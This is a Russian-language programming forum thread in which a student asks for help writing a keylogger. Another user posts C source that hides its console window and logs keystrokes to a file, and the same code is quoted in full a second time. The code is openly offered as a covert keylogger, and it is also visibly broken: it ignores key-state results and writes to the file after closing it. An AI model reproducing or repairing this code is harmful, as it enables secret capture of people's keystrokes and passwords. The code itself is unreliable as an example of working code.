Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > C/C++ программирование > Общие вопросы C/C++
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 31.03.2011, 08:23   #1
wwe2012
Пользователь
 
Аватар для wwe2012
 
Регистрация: 17.01.2011
Сообщений: 51
Вопрос Принцип работы WH_KEYBOARD_LL

Люди я хочу написать кейлогер. Я думал что написать можно с помашью функции kbhit(); но умные люди на форуме посоветовали с помашью WH_KEYBOARD_LL. Я учись на первом курси Можети привести пример работы WH_KEYBOARD_LL. Если я kbhit(); знал как работает то WH_KEYBOARD_LL безпонятия как работает можете обьеснить и превисти пример работы WH_KEYBOARD_LL. я даже незнаю как это WH_KEYBOARD_LL записать.
wwe2012 вне форума Ответить с цитированием
Старый 31.03.2011, 08:41   #2
p51x
Старожил
 
Регистрация: 15.02.2010
Сообщений: 15,709
По умолчанию

http://www.google.ru/search?client=o...hannel=suggest
p51x вне форума Ответить с цитированием
Старый 31.03.2011, 14:54   #3
wwe2012
Пользователь
 
Аватар для wwe2012
 
Регистрация: 17.01.2011
Сообщений: 51
Вопрос

Цитата:
Сообщение от p51x Посмотреть сообщение
а можете показать принцип работы на примери с коментарями
wwe2012 вне форума Ответить с цитированием
Старый 31.03.2011, 21:57   #4
Акоб
Форумчанин
 
Регистрация: 10.01.2011
Сообщений: 243
По умолчанию

Здесь какая-то ошибка.
Код:
#include <windows.h>
#include <stdio.h>
#include <time.h>
#include <iostream.h>

int main(void)
{
  HWND stealth;
  AllocConsole();
  stealth=FindWindowA("ConsoleWindowClass",NULL);
  ShowWindow(stealth,0);
  FILE *file;
  file=fopen("C:\\file.txt", "a+");
  time_t theTime=time(0);
  fputs("\nStarted logging: ", file);
  fputs(ctime(&theTime),file);
  short t = 12;
  fputs("aaaaaaaaaaa", file);
         short character;

       while(1)
       {
          Sleep(10);
		  for(character=8;character<=222;character++)
          {
                                 
              GetAsyncKeyState(character);
              if((character>=39)&&(character<=64))
                  {
                     fputc(character,file);
                     fclose(file);
                     break;
                  }    
                  else if((character>64)&&(character<91))
                  {
                     character+=32;
                     fputc(character,file);
                     fclose(file);
                     break;
                  }
                  else
                  {
                    switch(character)
                    {
                       case VK_SPACE:
                       fputs("Space",file);
                       fclose(file);
                       break;  
                       case VK_SHIFT:
                       fputs("\r\n[SHIFT]\r\n",file);
                       fclose(file);
                       break;                      
                       case VK_RETURN:
                       fputs("\r\n[ENTER]\r\n",file);
                       fclose(file);
                       break;
                       case VK_BACK:
                       fputs("\r\n[BACKSPACE]\r\n",file);
                       fclose(file);
                       break;
                       case VK_TAB:
                       fputs("\r\n[TAB]\r\n",file);
                       fclose(file);
                       break;
                       case VK_CONTROL:
                       fputs("\r\n[CTRL]\r\n",file);
                       fclose(file);
                       break;  
                       case VK_DELETE:
                       fputs("\r\n[DEL]\r\n",file);
                       fclose(file);
                       break;
					}
				  }    
		  }
        }         

   
  return 0;
}
Акоб вне форума Ответить с цитированием
Старый 01.04.2011, 10:00   #5
wwe2012
Пользователь
 
Аватар для wwe2012
 
Регистрация: 17.01.2011
Сообщений: 51
Вопрос

Цитата:
Сообщение от Акоб Посмотреть сообщение
Здесь какая-то ошибка.
Код:
#include <windows.h>
#include <stdio.h>
#include <time.h>
#include <iostream.h>

int main(void)
{
  HWND stealth;
  AllocConsole();
  stealth=FindWindowA("ConsoleWindowClass",NULL);
  ShowWindow(stealth,0);
  FILE *file;
  file=fopen("C:\\file.txt", "a+");
  time_t theTime=time(0);
  fputs("\nStarted logging: ", file);
  fputs(ctime(&theTime),file);
  short t = 12;
  fputs("aaaaaaaaaaa", file);
         short character;

       while(1)
       {
          Sleep(10);
		  for(character=8;character<=222;character++)
          {
                                 
              GetAsyncKeyState(character);
              if((character>=39)&&(character<=64))
                  {
                     fputc(character,file);
                     fclose(file);
                     break;
                  }    
                  else if((character>64)&&(character<91))
                  {
                     character+=32;
                     fputc(character,file);
                     fclose(file);
                     break;
                  }
                  else
                  {
                    switch(character)
                    {
                       case VK_SPACE:
                       fputs("Space",file);
                       fclose(file);
                       break;  
                       case VK_SHIFT:
                       fputs("\r\n[SHIFT]\r\n",file);
                       fclose(file);
                       break;                      
                       case VK_RETURN:
                       fputs("\r\n[ENTER]\r\n",file);
                       fclose(file);
                       break;
                       case VK_BACK:
                       fputs("\r\n[BACKSPACE]\r\n",file);
                       fclose(file);
                       break;
                       case VK_TAB:
                       fputs("\r\n[TAB]\r\n",file);
                       fclose(file);
                       break;
                       case VK_CONTROL:
                       fputs("\r\n[CTRL]\r\n",file);
                       fclose(file);
                       break;  
                       case VK_DELETE:
                       fputs("\r\n[DEL]\r\n",file);
                       fclose(file);
                       break;
					}
				  }    
		  }
        }         

   
  return 0;
}
а что делает программа
wwe2012 вне форума Ответить с цитированием
Старый 01.04.2011, 15:46   #6
Акоб
Форумчанин
 
Регистрация: 10.01.2011
Сообщений: 243
По умолчанию

Это кейлоггер, но кажется не совсем правильно работает.Не могу понять в чем ошибка.
Акоб вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Принцип работы quadratic probing watchdog Помощь студентам 0 12.01.2011 22:38
Принцип работы NS-серверов Ivan_32 Свободное общение 1 31.10.2010 03:38
Принцип работы менеджеров загрузки ОС. S_Yevgeniy Операционные системы общие вопросы 2 02.09.2010 11:03
Объсните принцип работы программы Ge0rGE Помощь студентам 1 10.06.2009 21:50